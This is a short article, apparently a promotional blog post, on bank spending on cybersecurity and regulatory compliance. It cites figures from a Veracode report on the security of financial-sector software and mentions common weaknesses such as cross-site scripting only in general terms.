Banks are investing big in cybersecurity. According to Lexology, HSBC has earmarked $1 billion for cybersecurity enhancements, while JPMorgan Chase has doubled down on spending with plans to hit $500 million by the end of 2015. Even financial institutions that aren't actively ramping up their resources are busy backing startups they hope will provide the next generation of cybersecurity. All this investment begs the question: What's the real state of cybersecurity in finance?
As noted by Inside Counsel, part of what makes financial cybersecurity so difficult is the wide array of organizational types and sizes in the United States. There's no single rule — or set of rules — that meet the needs of both small credit unions and billion-dollar banks while also keeping consumer data safe and sound. But common ground does exist: The risk of cyberattacks that could leave company data exposed and consumer information at risk. As a result, security tools are often designed to reduce that possibility and mitigate the damage of these attacks, but this is only the beginning. Banks aren't just on the hook to sidestep malicious attacks; they're also charged with handling sensitive data in a way that complies with regulatory standards. Doing so demands ongoing vendor oversight in addition to significant insurance investments and "embedding cybersecurity into the bank's culture and compliance systems."
In other words, common sense isn't so common when it comes to financial cybersecurity, because it's impossible to predict every possible angle of attack while also ensuring that vendors are living up to their security promises and employees aren't accidentally putting sensitive data at risk. Banks now face an ultimatum — adapt, or cash out.
Bull and Bear
According to Veracode's new "State of Software Security Report: Focus on Industry Verticals," cybersecurity in finance is bullish and bearish in turns. When it comes to compliance, 42 percent of all financial applications meet the OWASP Top 10 Policy on first risk assessment, putting them at the top of the list ahead of manufacturing (35 percent), healthcare (31 percent) and government (24 percent). What's more, 65 percent of all flaws detected in financial apps were fixed, the second-highest by industry vertical after the manufacturing sector. This is no surprise since the protection of financial data is a top priority for regulators and consumers alike.
In other areas, however, financial cybersecurity falls short. For example, 65 percent of all financial software comes with code quality problems, and banks are often at risk of both cross-site scripting (XSS) and cryptographic vulnerabilities, both of which can result in significant data loss and damage to public reputation. It's also worth noting that financial apps tend to be coded one of two ways: Java or the .NET framework. This lack of diversity makes it easier for hackers to find a break-in point as there's little chance anything like ColdFusion or PHP forms the backbone of banking software.
It all comes down to this: Banks are investing big in cybersecurity because they can tell which way the wind is blowing — threat vectors are evolving to subvert even the best defense systems. But investment alone isn't enough; financial institutions must also find ways to deal with existing code and ensure it's not just cyberattack-ready but also capable of meeting new regulatory standards. To learn more on the state of cybersecurity in finance, be sure to check out Veracode's full report.